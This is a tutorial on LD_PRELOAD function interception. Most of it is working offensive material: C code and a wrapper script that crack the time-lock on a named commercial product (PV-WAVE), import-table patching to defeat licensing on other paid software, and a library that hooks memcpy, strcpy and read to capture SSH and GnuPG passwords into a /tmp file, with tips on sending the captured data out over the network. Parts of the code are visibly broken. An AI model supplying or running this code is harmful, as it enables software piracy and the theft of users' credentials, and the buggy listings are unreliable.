Nigrum Libro Interceptis
by the xorcist
LD_PRELOAD is the name of an environment variable on GNU/Linux and Solaris systems which instructs the dynamic linker to preload and bind a user-specified library prior to binding symbols from the system libraries.
This allows the user to completely intercept many function calls made by a program.
The mechanism is very simple to use and it is hoped that novice C programmers will be able to use this tutorial and its sample code to create libraries of their own.
Below, the reader is shown the basic effect of function overloading and is shown a simple way to call the original function. From there, we use the techniques to crack the time-lock of the PV-WAVE software (www.roguewave.com), and steal passphrases from SSH.
We close with a brief discussion of other possible uses of LD_PRELOAD.
The Basics of Writing Overloadable Libraries
First, a C file is created which defines the functions that one wishes to intercept, optionally calling the original function by means of libdl.
It is compiled to .o, and linked to .so, and can then be used with LD_PRELOAD.
Let me contrive a simple example for you, and we'll walk through two different layers of intercepting and manipulating program flow through LD_PRELOAD.
main.c
#include <stdio.h> #include <string.h> int main() { if (!strcmp("red", "black")) printf("true\n"); else printf("false\n"); return 0; }hack.c
int strcmp(char **a, char **b) { return 0; }Now, we compile our code:
$ gcc -o foo main.c $ ./foo false $ gcc -fPIC -c hack.c ; ld -shared -Bsymbolic -o hack.so hack.o $ export LD_PRELOAD=./hack.so $ ./foo trueObviously, our dummy strcmp() worked like a charm, but it will always return 0.
This is fine for this example, but in a real program, we'll need to be able to call the real strcmp()! To do this, we maintain a function pointer to the real strcmp(), as so:
hack2.c
/* Utility function to return the pointer to a function named by a string */ static void *getfunc(const char *funcName) { void *tmp; if ((res = dlsym(RTLD_NEXT, funcName)) == NULL) { fprintf(stderr, "error with %s: %s\n", funcName, dlerror()); _exit(1); } return tmp; } /* Typedef ourselves a function pointer compatible with strcmp() */ typedef char *(*strcmp_t)(char *a, const char *b); /* A new strcmp() which only returns 0 if its arguments are "red" and "black" * otherwise it returns the true string comparison */ int strcmp(char **a, char **b) { static strcmp_t old_strcmp = NULL; /* Set up old_strcmp as a name for the real strcmp() function */ old_strcmp = getfunc("strcmp"); if ((!old_strcmp("red", a)) && (!old_strcmp("black", b))) return 0; return old_strcmp(a, b); }Using these basic techniques, and some creativity in the choice of which functions to overload, all sorts of useful things can be done.
Now that we've seen the basic mechanisms of using LD_PRELOAD, we'll start looking at practical uses.
Subverting Time-locked Demonstration Programs
The first application that we'll put together is a generic library for cracking time-locked demo programs.
The strategy that we will use is to create a shared library which constrains the time returned by gettimeofday() to a configurable interval (specified by environment variables).
This way, one instance of the library can be used to fool multiple time-locked demos using different valid date ranges.
As a field test, we'll apply our library against a working time-locked demo of PV-WAVE.
Just like many other commercial Linux/UNIX programs, this program uses FlexLM as its license manager. Success against PV-WAVE implies applicability against most other commercial demos as well.
We'll call our library fakedate.so and we define the following environment variables:
- FAKEDATE_MIN: The minimum epoch integer (number of seconds since 1970-01-01 00:00:00 UTC) to return via gettimeofday().
- FAKEDATE_MAX: The maximum epoch integer to return via gettimeofday().
- FAKEDATE_DEBUG: A flag which, when present, causes the printing of debugging or tracing info to stderr.
- FAKEDATE_NUMCALLS: The number of runs for which we'll return a fake date. "0" means that we'll always return a bogus time. Useful for fooling an expiry check that happens only at startup.
Overloaded functions: gettimeofday() and time().
fakedata.c
#include <stdio.h> #include <unistd.h> #include <stdlib.h> /* Declare global state that our hijacked functions use */ int HAVE_OPTS = NULL; /* have we already checked the environment? */ int RUN = 0; /* How many times has gettimeofday() run */ int NUMCALLS = 0; /* How many times to return a bogus time, 0 = always */ int DEBUG = NULL; /* Do we print debugging info? */ int START_TIME; /* Remember the time we started */ time_t MIN = 0; /* Minimum time value to return */ time_t MAX = 0; /* Maximum time value to return */ /* Inspect the environment and set up the global state */ void loadopts() { if (getenv("FAKEDATE_DEBUG")) DEBUG = 1; if (getenv("FAKEDATE_MAX")) MAX = atol(getenv("FAKEDATE_MAX")); else MAX = 1; if (getenv("FAKEDATE_CALLS")) NUMCALLS = atol(getenv("FAKEDATE_CALLS")); else NUMCALLS = 0; if (getenv("FAKEDATE_MIN")) FAKEDATE_MIN = atol(getenv("FAKEDATE_MIN")); else FAKEDATE_MIN = 0; __gettimeofday(tv, tz); START_TIME = tv->tv_sec; HAVE_OPTS = 1; } int gettimeofday(struct timeval *tv, struct timezone *tz) { int ret; if (!HAVE_OPTS) loadopts(); /* Get the genuine current time */ ret = __gettimeofday(tv, tz); /* If we're munging the date, we map the time into our interval */ if ((NUMCALLS == 0) || (RUN++ < NUMCALLS)) tv->tv_sec = MIN + (tv->tv_sec - MIN) % (MAX - MIN); if (DEBUG) { fprintf(stderr, "FakeDate: GetTimeOfDay [%d , %d] ", MIN, MAX); fprintf(stderr, "(tv->tv_sec = %d) ", tv->tv_sec); fprintf(stderr, "(%d total calls)\n", NUMCALLS); } return ret; } time_t time(time_t * t) { time_t h; struct timeval { long tv_sec; long tv_usec; } tv; struct timezone { int tz_minuteswest; int tz_dsttime; } tz; gettimeofday(&tv, &tz); h = tv.tv_sec; if (DEBUG) fprintf(stderr, "FakeDate: Time() [%d, %d] (Returned %d)\n", MIN, MAX, h); if (t) (*t) = h; return h; }Now, to direct this library against the PV-WAVE time-lock.
If we just finished installing PV-WAVE, we have 12 days to evaluate it before it shuts off (we'll use 11 days to be safe).
So we proceed by getting the time interval we are interested in as seconds from the epoch:
$ d=`date +'%s'` ; echo -e "\nMin: $d\nMax: $[$d+24*60*60*11]" Min: 1192702886 Max: 1193655286If PV-WAVE was installed to /usr/local/vni and the fakedate.so library is also placed there, we can now put a wave.sh front-end script in /usr/local/bin such as:
wave.sh
#!/bin/bash . /usr/local/vni/wave/bin/wvsetup.sh export LD_PRELOAD=/usr/local/vni/fakedate.so export FAKEDATE_MIN=1192702886 export FAKEDATE_MAX=1193653286 export FAKEDATE_NUMCALLS=1 /usr/local/vni/wave/bin/wave $*And that's it.
However, I'll give you a hint here. You don't need to specify the epoch range as the 11 day period.
In fact, it is somewhat better to actually constrain the interval to a few seconds. This is because when the program does its expiry check, if the apparent time is very early in the evaluation period, no warnings or messages about time-outs or registration are given.
As the time counts down, PV-WAVE starts reminding you that it will expire. By constraining the interval to just a few seconds, we insure that PV-WAVE will never nag us.
We can now verify proper functionality.
First, you can break it by moving the epoch range in /usr/local/bin/wave ahead to force the program to time out:
$ cat broken #!/bin/bash . /usr/local/vni/wave/bin/wvsetup.sh export LD_PRELOAD=/usr/local/lib/fakedate.so export FAKEDATE_MIN=2192702886 export FAKEDATE_MAX=2193653286 export FAKEDATE_NUMCALLS=1 /usr/local/vni/wave/bin/wave $* $ ./broken -64 The evaluation period for CL has expired. Contact your system administratorNow, you can move it back and voilà, it works again:
$ cat working #!/bin/bash . /usr/local/vni/wave/bin/wvsetup.sh export LD_PRELOAD=/usr/local/lib/fakedate.so export FAKEDATE_MIN=1192702886 export FAKEDATE_MAX=1193653286 export FAKEDATE_NUMCALLS=1 /usr/local/vni/wave/bin/wave $* $ ./working -64 PV-WAVE Version 9.00 (linux linux64 x86_64). Copyright (C) 2007, Visual Numerics, Inc. All rights reserved. Unauthorized reproduction prohibited. PV-WAVE v9.00 UNIX/WINDOWS ...Next, let's actually set the system time ahead, say, one year and try the working script.
When we get our WAVE> prompt, we enter the command: PRINT, TODAY()
And we'll see a coded date structure equal to the system time and outside the licensed epoch range.
The first call to gettimeofday() fooled the expiry check and now we're returning the real value because FAKEDATE_NUMCALLS is equal to 1.
$ date; ./working -64 Wed Oct 22 18:15:22 EDT 2008 PV-WAVE Version 9.00 (linux linux64 x86_64). Copyright (C) 2007, Visual Numerics, Inc. All rights reserved. Unauthorized reproduction prohibited. PV-WAVE v9.00 UNIX/WINDOWS Your current interactive graphics device is: X If you are not running on a linux integrated display use the SET_PLOT command to set the appropriate graphics device (if you have not already done so). The following function keys are defined with PV-WAVE commands: F1 - Start the PV-WAVE Demonstration/Tutorial System F2 - Invoke the PV-WAVE Online Help Facility F3 - Output the PV-WAVE Session Status PV-WAVE Visual Exploration technology available. PV-WAVE IMSL Mathematics technology available. PV-WAVE IMSL Statistics technology available. Enter "NAVIGATOR" at the WAVE> prompt to start the PV-WAVE Navigator. WAVE> PRINT, TODAY() { 2008 10 22 18 16 2.00000 93541.761 0 } WAVE>We now have a fully functional copy of PV-WAVE, and if we use the few-second trick, we don't even get the nagging registration reminders.
This library can also be leveraged against other commercial Linux applications, including pricey high-profile software like MATLAB, Research Systems Inc.'s IDL, and others. (And don't forget to set your system time back to the current date!)
Function Tracing to Steal Passwords
While the operating system won't allow Set User ID (SUID) programs to honor LD_PRELOAD (so no intercepting passwd or su), there are other important programs, like GnuPG, SSH, Telnet, or KWalletManager which we can subvert in order to steal passphrases, plaintext, and other secret bits.
Which functions would be most useful to us?
We certainly can expect to get a peek up someone's skirt by overloading memcpy().
Likewise, strcpy() and strncpy() are good choices as well, and for the same reasons.
On the I/O side, we'll overload read().
We could easily think of many more functions to add here.
getpass() is conspicuously absent from our list only because it is deprecated. If you're targeting a legacy application, though, it is easy enough to add.
Our method will be simple passive eavesdropping on the four above-named functions.
We'll export the data that we intercept by appending it to a file in /tmp.
If actually deployed, we'd want to take some precautions here. Perhaps we might like to encrypt this file by burying a public-key into our lib and randomly generating a symmetric key. Or, we could transmit the contents out over the network in real-time. But for this example, I'll just leave it sitting in a file out in /tmp.
peekaboo.c
#include <stdio.h> #define __USE_GNU 1 #include <unistd.h> #include <dlfcn.h> #define FILENAME "/tmp/icu.txt" /* Typedef our function pointers */ typedef void *(*memcpy_t)(void *dest, const void *src, size_t n); typedef ssize_t(*read_t) (int FD, void *buf, size_t n); typedef char *(*strcpy_t)(char *dest, const char *src); typedef char *(*strncpy_t)(char *dest, const char *src, size_t n); /* Our global file pointer */ FILE *peekaboofile = NULL; static void *getfunc(const char *funcName) { void *tmp; if ((res = dlsym(RTLD_NEXT, funcName)) == NULL) { fprintf(stderr, "error with %s: %s\n", funcName, dlerror()); _exit(1); } return tmp; } void ensure - file() { if (!peekaboofile) peekaboofile = fopen(FILENAME, "a"); } char *strncpy(char *dest, char *src, size_t n) { static strncpy_t real_strncpy = NULL; ensure - file(); fprintf(peekaboofile, "STRNCPY: \nSRC: %s\nDST: %s\nSIZE: %d\n------------------------\n", src, dest, n); real_strncpy = getfunc("strncpy"); return real_strncpy(dest, src, n); } char *strcpy(char *dest, char *src) { static strcpy_t real_strcpy = NULL; ensure - file(); fprintf(peekaboofile, "STRCPY: \nSRC: %s\nDST: %s\n------------------------\n", src, dest); real_strcpy = getfunc("strcpy"); return real_strcpy(dest, src); } void *memcpy(void *dest, const void *src, size_t n) { static memcpy_t real_memcpy = NULL; ensure - file() fprintf(peekaboofile, "MEMCPY: : "); fwrite(src, n, 1, stderr); fprintf(peekaboofile, "\nDST: "); fwrite(dest, n, 1, stderr); fprintf(peekaboofile, "\nSIZE: %d\n----------------------\n", n); real_memcpy = getfunc("memcpy"); return real_memcpy(dest, src, n); } ssize_t read(int FD, void *buf, size_t n) { static read_t real_read = NULL; ssize_t i; ensure - file(); real_read = getfunc("read"); i = real_read(FD, buf, n); fprintf(peekaboofile, "READ:\nFD: %d\nBUF: %s\nSIZE: %d\n-------------------\n", FD, buf, n); return i; }For our field test with this library, we'll examine SSH.
Let's get right to it and test this out.
Set up LD_PRELOAD, and SSH to a host of your choice, and log in.
Now, let's take a look at /tmp/icu.txt with something like less.
SSH starts off making a bunch of strncpy() such as:
$ less /tmp/icu.txt ... STRNCPY: SRC: Argument list too long DST: SIZE: 32 ------------------- STRNCPY: SRC: Exec format error DST: SIZE: 32 ------------------- ...where it is apparently setting up an internal array of messages. Then we hit a block of several read() and memcpy() where the connection is established and options negotiated.
First, let's find out what the remote host and username are...
Search the file for the string SRC: ssh-connection and you'll find a few memcpy() up is the username on the remote host.
Search for the string SRC: host@ and you'll find the remote hostname.
That was easy.
Now to find the password: Just search the file for the string password and you'll notice that near one of them (the third, in my capture) is the cleartext password intercepted by memcpy().
MEMCPY: SRC: password DST: none<F1><FE>rw SIZE: 8 ------------------- MEMCPY: SRC: ^Q DST: <C2> SIZE: 1 ------------------- MEMCPY: SRC: ^@^@^@^H DST: <BE> ^K<E0> SIZE: 4 ------------------- MEMCPY: SRC: this-is-my-secret-password DST: <87>G<E2>^D@<E8> SIZE: 8 -------------------In experiments with this and other similar code, every user-land program that handles passwords was vulnerable to this sort of eavesdropping - including GnuPG, Telnet, rdesktop, etc.
This is abysmal, given how easy it is to frustrate this method. Simple statically-linked clones of getenv() and strcmp() are all that are needed to inspect the environment at startup to insure privacy.
Import Table Patching
Since every piece of software is different, as you might expect, the results of using LD_PRELOAD to overload, say, gettimeofday() will differ.
Suppose, for example, you have a software package where only one binary includes time-lock licensing checks and other binaries use gettimeofday() for other uses.
You might like the other binaries to use the proper gettimeofday(), and only have the time-locked binary get tricked.
One way to do this is by patching the function import table.
Simply open your binary in a hex editor and search for gettimeofday. You'll find that string in an area with other function names nearby. Now, you can patch that string and rename it to getximeofday.
Now change your LD_PRELOAD library to provide a getximeofday() function.
The time-locked binary will be fooled, and other binaries will run the proper function and get the correct time.
Using such methods, it is easy to get a very robust crack for many types of evaluation licensed software with minimal effort.
After the library is built, most software examples of that sort can be defeated in 20 to 30 seconds, or less.
Closing Comments
There are many other uses for LD_PRELOAD, naturally.
You might intercept writes to the sound card and dump PCM data to rip audio from software which otherwise does not support the ability to save (Adobe Flash, for instance).
Another important use is for function profiling and reverse engineering.
By overloading selected functions, you can obtain traces of function execution, or counts of the number of times a function was called, etc.
This can be very useful for general debugging purposes.
Code: main.c
Code: hack.c
Code: hack2.c
Code: fakedate.c
Code: wave.sh
Code: peekaboo.c